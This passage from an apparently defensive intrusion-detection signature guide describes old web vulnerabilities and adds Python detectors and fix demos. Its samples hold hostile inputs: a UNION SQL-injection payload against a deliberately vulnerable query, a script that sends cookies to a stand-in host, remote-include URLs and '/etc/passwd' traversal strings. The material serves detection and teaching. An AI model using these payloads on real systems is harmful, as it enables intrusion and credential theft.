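        print(f"{name:15s} substring-check={vuln!s:5s} hardened-check={fixed}")
```

The hardened check rejects a second extension on purpose: on servers that map any extension in the name to a handler, 'shell.php.jpg' can still be executed, so the name is treated as suspect even though it ends in an image extension.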
Signature ID: 665
HTTP Client - Novarg Worm
Threat Level: Warning
Signature Description: The Novarg worm infects systems through email attachments and peer-to-peer file sharing; its targets are Win32 computers. Once a system is infected, the worm installs a backdoor that gives an attacker remote access to the system. This signature is triggered when infected systems attempt the denial-of-service attack against the SCO web site.
Signature ID: 668
PHPBB2 Image Tag HTML Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0902 Bugtraq: 4858
Signature Description: A cross-site scripting vulnerability is caused by the failure of a site to validate user input before returning it to the client's web browser. The essence of cross-site scripting is that an intruder causes a legitimate web server to send a page to a victim's browser that contains malicious script or HTML of the intruder's choosing. The malicious script runs with the privileges of a legitimate script originating from that web server. This rule attempts to detect a cross-site scripting attempt that uses the img HTML tag. The affected versions of phpBB are 2.0 RC-4 and prior; the issue is fixed in phpBB 2.0.1 and later.
Signature ID: 669
XSS to steal cookies vulnerability
Threat Level: Information
Signature Description: This rule attempts to detect a possible cross-site scripting (XSS) attempt. It is triggered when (1) an attacker sends data (for example, malicious script) to a web site so that other users will later retrieve it, which lets the attacker steal those users' cookies, or (2) a user accesses a web site that has already been compromised by an attacker who inserted malicious script.
Signature ID: 671
A possible attempt to crash IE 6 using code <table datasrc=".">
Threat Level: Information
Signature Description: This rule attempts to detect an attempt to crash Internet Explorer 6. It is triggered when a user accesses a web site that has already been compromised by an attacker and the returned page contains HTML such as <table datasrc=".">; when IE 6 renders such a page, it crashes. The rule also attempts to detect the insertion of this HTML into a page that is writable from outside, such as a feedback or posting form, since the resulting page crashes IE 6 for every visitor.
Signature ID: 673
A possible attempt to crash IE 6 using code <acronym><dd><h5>
Threat Level: Information
Signature Description: This rule attempts to detect an attempt to crash Internet Explorer 6. It is triggered when a user accesses a web site that has already been compromised by an attacker and the returned page contains HTML such as <acronym><dd><h5><applet></caption></applet><li></h1>; when IE 6 renders such a page, it crashes. The rule also attempts to detect the insertion of this HTML into a page that is writable from outside, such as a feedback or posting form, since the resulting page crashes IE 6 for every visitor.
Signature ID: 675
A possible attempt to SQL injection (1)
Threat Level: Information
Signature Description: SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a web form input to gain access to resources or make changes to data. This rule is triggered when an attacker accessing the internal web site inserts SQL metacharacters (for example, when filling in a 'feedback' form) in an attempt to trigger a SQL injection attack.
Signature ID: 676
A possible attempt to SQL injection (2)
Threat Level: Information
Signature Description: SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a web form input to gain access to resources or make changes to data. This rule attempts to detect a possible SQL injection attempt; it is triggered when an attacker accessing the web site inserts SQL metacharacters in an attempt to trigger a SQL injection attack.
Signature ID: 703
W3C Jigsaw Device Name Path Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1052 Bugtraq: 5251,5258 Nessus: 11047
Signature Description: Jigsaw is a web server produced by the World Wide Web Consortium (W3C) to demonstrate new web protocols and other features. It is written in the Java programming language. Jigsaw version 2.2.1 has a denial-of-service vulnerability involving MS-DOS device names. This rule triggers when an attacker sends HTTP requests for '/servlet/con' (the CON device name) more than 30 times; an attacker can use this vulnerability to cause a denial of service. This issue is fixed in Jigsaw 2.2.1 Build 20020711 or later; upgrade to that build or later, available at the vendor's web site.
Signature ID: 705
PhpBB Viewtopic.PHP SQL Injection Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0486 Bugtraq: 7979 Nessus: 11767
Signature Description: phpBB is an open-source bulletin board application and a popular Internet forum package written in PHP. phpBB version 2.0.5 and earlier has a SQL injection vulnerability. This rule triggers when an attacker sends specially-crafted SQL statements to the viewtopic.php script through the topic_id variable; an attacker can use this vulnerability to steal password hashes and gain unauthorized access to accounts. The issue is fixed in later versions; update to the latest version of phpBB, available at the vendor's web site.
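The following added example serves signatures 675, 676 and 705. It is not phpBB's code and not part of this guide: a toy viewtopic-style lookup that splices topic_id into the SQL text, the same lookup with a validated, bound parameter, and the request-side heuristic a rule can apply. The schema, rows, hash value and payload are constructed for the demonstration; only the idea (an unvalidated topic_id in a query returning other tables' data) comes from the signature description.

```python
"""Added example: SQL injection through a numeric parameter, the parameterised
fix, and a detection heuristic.  Not phpBB's code; schema and rows are
constructed."""
import re
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_topics(topic_id INTEGER, topic_title TEXT);
        CREATE TABLE phpbb_users(username TEXT, user_password TEXT);
        INSERT INTO phpbb_topics VALUES (1, 'Welcome');
        INSERT INTO phpbb_users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def view_topic_vulnerable(db, topic_id):
    # The client-supplied value becomes part of the statement text, so a
    # UNION in it pulls rows from any table the application can read.
    sql = "SELECT topic_title FROM phpbb_topics WHERE topic_id = " + topic_id
    return [row[0] for row in db.execute(sql)]


def view_topic_fixed(db, topic_id):
    # Type-check first, then bind: the value can never change the shape of
    # the statement, whatever characters it carries.
    if not re.fullmatch(r"\d{1,9}", topic_id):
        raise ValueError("topic_id must be a small positive integer")
    sql = "SELECT topic_title FROM phpbb_topics WHERE topic_id = ?"
    return [row[0] for row in db.execute(sql, (int(topic_id),))]


# Detection side: tokens a rule can look for in a request parameter.
_SQL_TOKENS = re.compile(
    r"(?i)(\bunion\b\s+(all\s+)?\bselect\b|'\s*or\s+'?\d|--|/\*|;\s*(drop|insert|update|delete)\b)"
)


def looks_like_sqli(param_name, value, numeric_params=("topic_id",)):
    """True when a parameter that should be numeric is not, or when any
    value carries SQL tokens."""
    if param_name in numeric_params and not value.strip().lstrip("-").isdigit():
        return True
    return _SQL_TOKENS.search(value) is not None


PAYLOAD = "-1 UNION SELECT user_password FROM phpbb_users"   # constructed


def demo():
    db = make_db()
    leaked = view_topic_vulnerable(db, PAYLOAD)      # hash comes back as a "title"
    try:
        view_topic_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked,
            "flagged": looks_like_sqli("topic_id", PAYLOAD),
            "benign_flagged": looks_like_sqli("topic_id", "42")}


if __name__ == "__main__":
    print(demo())
```

The numeric-parameter rule is the cheap, high-precision half of the check: for a parameter like topic_id anything but digits is an anomaly regardless of which SQL keywords appear, which is what keeps the token list from having to be exhaustive.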
Signature ID: 706
Weblogic FileServlet Show Code Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0682 Bugtraq: 1518 Nessus: 11724
Signature Description: BEA Systems WebLogic Server is an enterprise-level web and wireless application server. It provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA WebLogic Server version 5.x contains a flaw that may lead to unauthorized information disclosure. The issue is triggered when a user sends a request prefixed with /ConsoleHelp/, which invokes FileServlet and causes the source of documents under the web document root directory to be displayed rather than executed. The issue is fixed in WebLogic Server 6.0 SP2 and 6.1 SP2; administrators are advised to update to those or later versions, available at the vendor's web site.
Signature ID: 708
PMachine Lib.Inc.PHP Remote Include Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1086 Bugtraq: 7919 Nessus: 11739
Signature Description: PMachine is a web content management system available for the Unix and Linux operating systems. PMachine version 2.2.1 could allow a remote attacker to include malicious PHP files. This rule triggers when an attacker sends a specially-crafted URL request to the lib.inc.php script in which the pm_path variable names a PHP file on a remote system; an attacker can use this vulnerability to execute arbitrary code on the vulnerable system. No remedy available as of September, 2008.
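The remote file include signatures above (649 ttCMS admin_root, 651 BLNews $server, 656 b2 $b2inc, 659 P-News pn_lang, 708 PMachine pm_path) all look for the same thing: a query parameter whose value points the application's include at another host. The following added example, which is not the module's rule syntax and not any of those projects' code, shows that check over HTTP request lines. The script/parameter table, the addresses and the sample requests are constructed for the example.

```python
"""Added example: heuristic detector for PHP remote-file-include attempts in
HTTP request lines.  Not the module's rule syntax; samples are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Values that make include()/require() fetch code from elsewhere.  PHP also
# honours data: and php:// wrappers, so a detector that stops at http:// is
# incomplete.
_REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp|ftps|data|php)\s*:", re.IGNORECASE)
_PROTOCOL_RELATIVE = re.compile(r"^\s*//[^/]")

# Script/parameter pairs named by the signatures above (assumed lowercase).
WATCHED = {
    "header.php": {"admin_root"},
    "objects.inc.php4": {"server"},
    "gm-2-b2.php": {"b2inc"},
    "p-news.php": {"pn_lang"},
    "lib.inc.php": {"pm_path"},
}


def _decode(value, rounds=2):
    """Undo a second layer of percent-encoding (parse_qsl removed the first)."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def find_remote_includes(request_line):
    """Return (script, param, decoded value, known_pair) for every query
    parameter whose value points at another host.  known_pair is True when
    the script/parameter pair is one the signatures above name."""
    try:
        _method, target, _version = request_line.split(maxsplit=2)
    except ValueError:
        return []
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = _decode(value)
        if _REMOTE_SCHEME.match(value) or _PROTOCOL_RELATIVE.match(value):
            hits.append((script, name, value, name in WATCHED.get(script, ())))
    return hits


# Constructed sample traffic; 198.51.100.0/24 is a documentation range.
SAMPLE_REQUESTS = [
    "GET /ttcms/header.php?admin_root=http://198.51.100.7/evil.txt? HTTP/1.1",
    "GET /blnews/objects.inc.php4?server=%68ttp%3a%2f%2f198.51.100.7%2fcmd.php4 HTTP/1.0",
    "GET /b2-tools/gm-2-b2.php?b2inc=//198.51.100.7/x HTTP/1.0",
    "GET /news/p-news.php?pn_lang=en HTTP/1.1",
    "GET /pm/lib.inc.php?pm_path=../../../../etc/passwd HTTP/1.1",
]


def scan(requests=SAMPLE_REQUESTS):
    return {r: find_remote_includes(r) for r in requests}


if __name__ == "__main__":
    for req, hits in scan().items():
        print("ALERT" if hits else "ok   ", req, hits)
```

The last sample is a local file include (a traversal into the file system rather than a fetch from another host); it is deliberately not matched here, since that is a different check. The trailing '?' in the first payload is the usual trick for discarding whatever the vulnerable script appends to the included path.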
Signature ID: 709
Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0682 Bugtraq: 5193 Nessus: 11041
Signature Description: Apache Tomcat is the servlet container used in the official reference implementation of the Java Servlet and JavaServer Pages technologies. Apache Tomcat version 4.0.3 has a cross-site scripting vulnerability. This rule triggers when an attacker embeds malicious script in a request that uses the /servlet/ mapping to invoke various servlets. Successful exploitation allows an attacker to execute arbitrary script in a victim's browser. No remedy available as of September, 2008.
Signature ID: 710
Netscape Enterprise Server Directory Indexing Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0236 Bugtraq: 1063 Nessus: 10352
Signature Description: Netscape Enterprise Server is a web server used to host large-scale web sites. The affected version is Netscape Enterprise Server 3.x. With directory indexing enabled, the server allows remote attackers to list server directories via web publishing tags such as ?wp-ver-info and ?wp-cs-dump, and these listings are accessible to remote or local users without any authentication. An attacker can use this vulnerability to gain unauthorized access to documents or retrieve lists of file names (such as CGI scripts).
Signature ID: 711
CacheFlow CacheOS Unresolved Domain Cross Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1060 Bugtraq: 5305,5608
Signature Description: CacheOS is the firmware designed and distributed with CacheFlow web cache systems. CacheOS versions 2.1.02 and 4.1.06 have a cross-site scripting vulnerability. The vulnerability is caused by the error page returned to the user when a non-existent file is requested: the page echoes the request, including any JavaScript it contains, back to the browser. The vulnerability allows an attacker to make the server present the user with the attacker's JavaScript/HTML code. Since the content is delivered by the server, the user's browser gives it the trust level of the server (for example, the trust level of banks, shopping sites and similar would usually be high).
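Signatures 647, 668, 669, 709 and 711 all describe the same mechanism from different angles: script or HTML that reaches a victim's browser through a request the server reflects or stores. A literal match on '<script' misses the hex-encoded form that 647 and 709 describe and the [img]/img form that 668 describes. The following added example, which is neither the module's rule syntax nor any vendor's code, decodes the usual layers first and then classifies; the payload samples are constructed.

```python
"""Added example: decoder plus pattern matcher for reflected/stored XSS
attempts.  Not the module's rule syntax; samples are constructed."""
import html
import re
from urllib.parse import unquote

_XSS_PATTERNS = [
    ("script tag",      re.compile(r"<\s*script\b")),
    ("event handler",   re.compile(r"<\s*\w+[^>]*\bon\w+\s*=")),
    ("javascript: url", re.compile(r"(?:src|href|data)\s*=\s*['\"]?\s*javascript\s*:")),
    ("img tag",         re.compile(r"<\s*img\b")),
    ("iframe/object",   re.compile(r"<\s*(?:iframe|object|embed)\b")),
]


def normalize(payload, rounds=3):
    """Undo the encodings an attacker layers to slip past literal matching:
    percent-encoding (possibly nested), HTML entities, NUL bytes; then
    case-fold.  Stops early once a round changes nothing."""
    text = payload
    for _ in range(rounds):
        new = html.unescape(unquote(text))
        if new == text:
            break
        text = new
    return text.replace("\x00", "").lower()


def classify_xss(payload):
    """Return the names of the patterns matched after normalisation."""
    text = normalize(payload)
    return [name for name, rx in _XSS_PATTERNS if rx.search(text)]


# Constructed request fragments, one per evasion the signatures mention.
SAMPLES = {
    "hex-encoded script": "/test.php?name=%3Cscript%3Edocument.location%3D'http://198.51.100.7/c?'%2Bdocument.cookie%3C/script%3E",
    "double encoded":     "/search?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E",
    "img onerror":        "/post.php?body=<IMG SRC=x onerror=\"alert(document.cookie)\">",
    "entity encoded img": "/post.php?body=&lt;img src=javascript:alert(1)&gt;",
    "benign":             "/test.php?name=alice&page=2",
}


def scan(samples=SAMPLES):
    return {label: classify_xss(p) for label, p in samples.items()}


if __name__ == "__main__":
    for label, hits in scan().items():
        print(f"{label:20s} -> {hits or 'clean'}")
```

Decoding is bounded to a few rounds on purpose: a rule that decodes until stable can be fed a deeply nested encoding as a cheap way to burn inspection time, and three rounds already cover what a browser will actually decode.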
Signature ID: 712
Linux-PAM Pam_Unix.SO Authentication Bypass Vulnerability
Threat Level: Warning
Industry ID: CVE-2007-0003 Bugtraq: 22204
Signature Description: The Linux-PAM package contains Pluggable Authentication Modules, which let the local system administrator choose how applications authenticate users. Linux-PAM version 0.99.7.0 is prone to an authentication bypass vulnerability. Specifically, an error in the '_unix_verify_password()' function in 'modules/pam_unix/support.c' causes accounts whose password hash in '/etc/passwd' is only two characters long to accept any password; an attacker can exploit this to bypass security restrictions and gain unauthorized access to the system through such accounts. This issue is fixed in version 0.99.7.1. Administrators are advised to update to the latest version of Linux-PAM (0.99.7.1 or later), available at the vendor's web site.
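The following added example models the failure described for signature 712. It is a simplified Python reconstruction, not Linux-PAM's C source: it assumes that the computed hash was compared only up to the length of the stored value (a two-character stored hash then consists of nothing but the salt, which crypt copies into the front of its output, so every password matches). The crypt-like function and the passwd entries are constructed for the example.

```python
"""Added example: why a two-character stored hash matches any password when
the comparison is truncated to the stored length.  Simplified model, not
Linux-PAM's code; the hash function and accounts are constructed."""
import hashlib


def toy_crypt(password, salt):
    """Stand-in for crypt(3): output starts with the two-character salt,
    followed by a digest, as traditional DES crypt output does (13 chars)."""
    salt = salt[:2]
    digest = hashlib.sha256((salt + password).encode()).hexdigest()[:11]
    return salt + digest


def verify_vulnerable(password, stored_hash):
    """Assumed 0.99.7.0 behaviour: the computed hash is cut to the stored
    hash's length before comparing (done to tolerate hashes of different
    lengths).  With a two-character stored value only the salt is ever
    compared, and the salt is taken from the stored value itself."""
    if not stored_hash:
        return False
    computed = toy_crypt(password, stored_hash)
    return computed[:len(stored_hash)] == stored_hash


def verify_fixed(password, stored_hash):
    """Corrected check: a stored value too short to hold salt plus digest is
    invalid, and the full strings are compared."""
    if not stored_hash or len(stored_hash) <= 2:
        return False
    return toy_crypt(password, stored_hash) == stored_hash


# Constructed passwd-style entries: a normal account and one whose password
# field was left as a two-character value.
PASSWD = {
    "alice": toy_crypt("correct horse", "ab"),
    "svc":   "xy",
}


def audit(passwd=PASSWD, guess="anything"):
    """For each account: (accepted by vulnerable check, accepted by fixed check)."""
    return {user: (verify_vulnerable(guess, h), verify_fixed(guess, h))
            for user, h in passwd.items()}


if __name__ == "__main__":
    for user, verdict in audit().items():
        print(user, verdict)
```

The practical lesson survives the simplification: length- or prefix-limited comparisons of authenticators are unsafe, and a stored credential that cannot be a valid hash should fail closed rather than be compared at all.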
Signature ID: 713
Psunami.CGI Remote Command Execution Vulnerability
Threat Level: Information
Bugtraq: 6607 Nessus: 11750
Signature Description: Psunami is a CGI script that provides an online bulletin board for web sites. Psunami Bulletin Board version 0.5.2 is prone to a remote command execution vulnerability. This rule triggers when an attacker submits a URL request to the psunami.cgi script that contains shell commands between pipe characters (|) in the topic parameter. When the web server receives the HTTP request, the script passes the parameter to a shell, which executes the commands between the pipe characters. No remedy available as of September, 2008.
Signature ID: 714
PDGSoft Shopping Cart redirect.exe/changepw.exe Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0401 Bugtraq: 1256 Nessus: 11723
Signature Description: PDGSoft Shopping Cart is a web-based shopping cart system. PDGSoft Shopping Cart version 1.50 is vulnerable to a buffer overflow in the redirect.exe and changepw.exe programs. By sending a long query string, a remote attacker can overflow a buffer and execute arbitrary code on the system. Upgrade to the latest version of the software from the vendor's web site.
Signature ID: 715
Basilix Webmail Incorrect File Permissions Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1044 Bugtraq: 2198 Nessus: 10601
Signature Description: BasiliX is a web mail application based on PHP and IMAP and backed by the MySQL database server. It has a user-friendly interface, and its HTML files are easy to change and edit. If the web server is not configured to treat files with the '.class' or '.inc' extension as PHP scripts, a remote attacker can request these files over HTTP and receive their source, which may contain sensitive data such as the MySQL user name and password. The affected version of BasiliX is 0.9.7beta. No remedy available as of July, 2008.
Signature ID: 717
CGIScript.net csNews Header File Type Restriction Bypass Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0923 Bugtraq: 4994 Nessus: 11726
Signature Description: csNews is a script for managing news items on a web site. It runs on most Unix, Linux and Microsoft Windows operating systems. This rule triggers when an attacker sends a specially-crafted URL request to the csNews.cgi script containing double URL-encoded characters to reach the 'Advanced Settings' page. Once the attacker reaches the 'Advanced Settings' page, modified values can be set in the header and footer fields, which could allow the attacker to view arbitrary files or execute arbitrary commands. The vulnerable version of csNews is 1.0.0. No remedy available as of September, 2008.
Signature ID: 718
Netwin CWMail Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0273 CVE-2000-0828 Bugtraq: 4093,1657 Nessus: 11727
Signature Description: CWMail is a web-to-email gateway that allows users to read and process new email from a web browser on any machine with Internet access. CWMail versions prior to 2.8 have a buffer overflow vulnerability. This rule triggers when an attacker sends an overly long string in the 'item=' parameter using the forward option; a remote attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system. The issue is fixed in version 2.8a or later. Administrators are advised to update to the latest version of CWMail (2.8a or later), available at the vendor's web site.
Signature ID: 719
Trend Micro InterScan eManager register.dll Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is an application that inspects email traffic flowing into and out of a network for confidential or inappropriate material. It can inspect, modify and block email at the border of the enterprise. Trend Micro InterScan eManager versions 3.51 and 3.51J have a buffer overflow vulnerability. This rule triggers when an attacker sends long arguments to register.dll; an attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system.
Signature ID: 720
Sun NetDynamics Session ID Hijacking Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0922 Bugtraq: 3583 Nessus: 11730
Signature Description: NetDynamics is an application server platform designed to provide a comprehensive solution for enterprise-level portal applications. The vulnerable versions of NetDynamics are 4.x through 5.x. After a user logs in, the session ID remains valid for up to 15 seconds, during which an attacker who is familiar with NetDynamics commands can attempt to hijack the session; this rule triggers on such attempts. An attacker can use this vulnerability to execute arbitrary commands on the system with the privileges of the hijacked account. No remedy available as of July, 2008.
Signature ID: 721
Nph exploitscanget.cgi access vulnerability
Threat Level: Information
Bugtraq: 7911,7910,7913 Nessus: 11740
Signature Description: Infinity CGI Exploit Scanner is a web-based CGI vulnerability scanner, implemented in Perl and stored under the name 'nph-exploitscanget.cgi'. There is a flaw in this CGI that lets an attacker execute arbitrary commands on the host. In addition, there is a flaw that may allow an attacker to use this CGI to scan remote web servers. The CGI is also vulnerable to cross-site scripting.
Signature ID: 722
AT-admin.cgi Access vulnerability
Threat Level: Information
Industry ID: CVE-1999-1072
Signature Description: Excite for Web Servers (EWS) lets visitors explore and search a web site using a new generation of navigation technology; it allows web administrators to add 'smart search' capabilities to their home pages. Excite for Web Servers 1.1 is the vulnerable version. This rule triggers when an attacker sends an HTTP request to AT-admin.cgi; an attacker can gain privileges by obtaining the encrypted password from the world-readable Architext.conf authentication file. No remedy is available.
Signature ID: 723
Ion-p Remote File Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1559 Bugtraq: 6091 Nessus: 11729
Signature Description: ION Script is a language used to create IDL-driven web documents. ION (IDL On the Net) version 1.4.0 has a file disclosure vulnerability. This rule triggers when an attacker sends a specially-crafted URL request to the 'ion-p' script using the 'page' variable; an attacker can use this vulnerability to read or download files from the system. No remedy available as of September, 2008.
Signature ID: 724
WEB-MISC VsSetCookie.exe access vulnerability
Threat Level: Information
Industry ID: CVE-2002-0236 Bugtraq: 3784 Nessus: 11731
Signature Description: VitalNet is part of Lucent's VitalSuite SP product family. It allows users to monitor, analyze, manage and predict the performance of their network infrastructure. The affected version of VitalNet is 8.0. This rule triggers when an attacker bypasses authentication via a direct HTTP request to the VsSetCookie.exe program; an attacker can use this vulnerability to gain unauthorized access to the web server.
Signature ID: 725
Talentsoft Web+ Source Code Disclosure Vulnerability
Threat Level: Information
Bugtraq: 1722
Signature Description: Talentsoft Web+ is an e-commerce server designed to run under a web server to provide web storefronts. The affected version of Talentsoft Web+ is 4.6; it allows users to read arbitrary data files on the web server running the webpsvr daemon. This rule triggers when an attacker sends a request to the webplus.exe CGI application with '?script=<name of the file>::$DATA' appended to the end of the request. An attacker can use this vulnerability to view the source code of WML files, which may contain sensitive information such as data source and table names, user names and passwords, and can also retrieve the source code of other server-side scripts, such as Active Server Pages (ASP) files. The issue is fixed in Web+ build 542 or later, available at the vendor's web site.
Signature ID: 726
CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0749 Bugtraq: 4579,6265 Nessus: 11748
Signature Description: CGIScript.net provides various webmaster-related tools. A vulnerability has been reported in the csMailto.cgi script developed by CGIScript.net. csMailto is a Perl script designed to support multiple mailto: forms and also to send and receive files. The script stores all of the form configuration data in hidden fields in the form itself, where a client can alter it. An attacker can use this vulnerability to execute arbitrary commands via shell metacharacters in the form-attachment field. No remedy available as of September, 2008.
Signature ID: 727
Trend Micro OfficeScan cgiWebupdate.exe Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1150 Bugtraq: 3216 Nessus: 11722
Signature Description: Trend Micro OfficeScan is a centrally managed antivirus solution that allows administrators to manage virus and spyware protection in business environments. Trend Micro OfficeScan Corporate Edition versions 3.5.2 through 3.5.4 could allow a remote attacker to read arbitrary files on the server, caused by a vulnerability in the cgiWebupdate.exe program. This issue is triggered by sending specially-crafted requests to the web management interface to read arbitrary files with IUSER privileges.
Signature ID: 728
CGIScript.net csPassword.CGI Information Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0917 CVE-2002-0918 Bugtraq: 4887,4885,4886,4889
Signature Description: CGIScript.net provides various webmaster-related tools. A vulnerability has been reported in the csPassword.cgi script developed by CGIScript.net. csPassword version 1.0 stores .htpasswd files under the web document root, which could allow remote authenticated users to download the file and crack the passwords of other users. Apply the appropriate patch, available at the vendor's web site.
Signature ID: 729
Brian Stanback bsguest.cgi Remote Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0099 Bugtraq: 2159
Signature Description: bsguest.cgi is a script designed to handle guestbook submissions from web site visitors. Brian Stanback bsguest.cgi version 1.0.0 has an input validation vulnerability. The issue is triggered because the script fails to filter ';' characters from the user-supplied email address, which allows a remote attacker to execute arbitrary commands, for example to obtain the system's /etc/passwd file. The issue is fixed in version 3.0 or later. Administrators are advised to update to the latest version of bsguest.cgi (3.0 or later), available at the vendor's web site.
Signature ID: 730
TalentSoft Web+ Directory Traversal Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0282 Bugtraq: 1102
Signature Description: Talentsoft Web+ is an e-commerce server designed to run under a web server to provide web storefronts. It allows users to read arbitrary data files on the web server running the webpsvr daemon. The affected version of Talentsoft Web+ is 0.0.04.x. This rule triggers when an attacker sends a specially-crafted URL to webplus in which the 'script' variable contains '..' (dot dot) sequences; an attacker can use this vulnerability to read arbitrary files on the web server. This issue is fixed in Talentsoft Web+ build 513 or later; update to that build, available at the vendor's web site.
Signature ID: 731
DCForum Arbitrary cgforum.cgi Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1132 Bugtraq: 1951
Signature Description: DCForum is complete web conferencing software for building and managing an online discussion community. DCForum version 6.0 has a file disclosure vulnerability that can also cause a denial of service. DCForum could allow a remote attacker to view arbitrary files on the server with the privileges of the 'nobody' user or the web server. If the attacker attempts to view the source code of the dcforum.cgi script itself, the script deletes itself, causing a denial of service. This issue is fixed by the appropriate patch, available at the vendor's web site.
Signature ID: 732
WEB-INF folder accessible vulnerability
Threat Level: Information
Industry ID: CVE-2000-1050 CVE-2001-0179 Bugtraq: 1830,5119 Nessus: 11037
Signature Description: The WEB-INF directory contains Java class files, detailed web application configuration information, server-side libraries, session information and files such as web.xml and webapp.properties. This rule triggers when an attacker sends a specially-crafted URL request for a file in the /WEB-INF/ directory; an attacker can use this vulnerability to retrieve files located in the /WEB-INF/ directory.
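Signatures 658 ('../' in the Shoutbox $conf variable), 717 (double URL-encoded characters to csNews.cgi), 725 and 730 (the '::$DATA' suffix and '..' sequences sent to Web+), and 732 (/WEB-INF/ access) are all defeated by a literal string match if the attacker encodes, double-encodes, uses backslashes, or appends a stream suffix. The following added example, which is neither the module's rule syntax nor any vendor's code, normalises the request path and each parameter before matching; the sample URLs are constructed.

```python
"""Added example: request-path normaliser for traversal and path-disclosure
checks (encoded, doubly encoded, backslash and NTFS-stream forms).  Not the
module's rule syntax; sample URLs are constructed."""
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit


def decode_fully(text, limit=4):
    """Percent-decode until stable, so '%252e%252e%252f' becomes '../'.
    The limit keeps a hostile input from looping indefinitely."""
    for _ in range(limit):
        new = unquote(text)
        if new == text:
            break
        text = new
    return text


def normalize_path(raw_path):
    """Decode, fold backslashes to '/', drop NUL bytes and an NTFS stream
    suffix such as '::$DATA', then collapse '.' and '..'.  Returns
    (normalised path, escaped); escaped is True when the path climbs above
    the root, which posixpath.normpath alone would clip silently."""
    path = decode_fully(raw_path).replace("\\", "/").replace("\x00", "")
    path = re.sub(r"::\$[A-Za-z0-9_]+$", "", path)
    depth, escaped = 0, False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0
        else:
            depth += 1
    return posixpath.normpath("/" + path.lstrip("/")), escaped


def check_request(url):
    """Return the reasons a request would be flagged (empty when clean)."""
    parts = urlsplit(url)
    reasons = []
    path, escaped = normalize_path(parts.path)
    if escaped:
        reasons.append("path escapes document root")
    if re.search(r"/web-inf(?:/|$)", path, re.IGNORECASE):
        reasons.append("WEB-INF access")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(value)
        if "::$" in value:
            reasons.append(f"NTFS stream suffix in parameter {name}")
        if normalize_path(value)[1]:
            reasons.append(f"traversal in parameter {name}")
    return reasons


# Constructed requests, one per evasion named above.
SAMPLES = {
    "shoutbox": "/shoutbox.php?conf=../../../../etc/passwd",
    "csnews":   "/cgi-bin/csNews.cgi?database=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "webplus":  "/cgi-bin/webplus.exe?script=/login.wml::$DATA",
    "webinf":   "/app/..%5c..%5cWEB-INF/web.xml",
    "benign":   "/index.php?page=about&id=3",
}


def scan(samples=SAMPLES):
    return {label: check_request(url) for label, url in samples.items()}


if __name__ == "__main__":
    for label, reasons in scan().items():
        print(f"{label:9s} -> {reasons or 'clean'}")
```

The climb counter is kept separate from posixpath.normpath because normpath resolves '/app/../../x' to '/x' without complaint; the normalised path is still useful for the WEB-INF match, but the "escaped the root" fact has to be recorded before it is thrown away.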
Signature ID: 733
Sambar Server hello.bat Code Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0213 Bugtraq: 1002 Nessus: 10246
Signature Description: The Sambar Server is a multi-threaded HTTP, FTP and proxy server for Windows NT and Windows 95. Sambar Server 4.2.0 Beta 7 contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when additional commands are appended to a request for the 'hello.bat' file. An attacker can use this vulnerability to read, modify, create or delete any file or directory on the system, including user accounts. The issue is fixed in Sambar Server version 4.3 Beta 8; update to that version, available at the vendor's web site.
Signature ID: 734
Vpopmail-CGIApps 'vpasswd.cgi' Remote Command Execution Vulnerability
Threat Level: Information
Bugtraq: 6038 Nessus: 11165
Signature Description: vpopmail is the virtual-domain core of Mail::Toaster: all of the user authentication, permissions, quota and other settings that relate to email users and virtual domains are managed by vpopmail and its collection of tools. vpopmail-CGIApps versions prior to 0.3 have an input validation vulnerability. This rule triggers when an attacker embeds arbitrary commands, separated by a semicolon (;), in the password form field of the vpasswd.cgi script, which is used to change user passwords. The script changes the password by building a command line from the form fields and passing it to the os.system() function, so the embedded commands run on the web server. This issue is fixed in version 0.3 or later; update to the latest version of vpopmail-CGIApps, available at the vendor's web site.
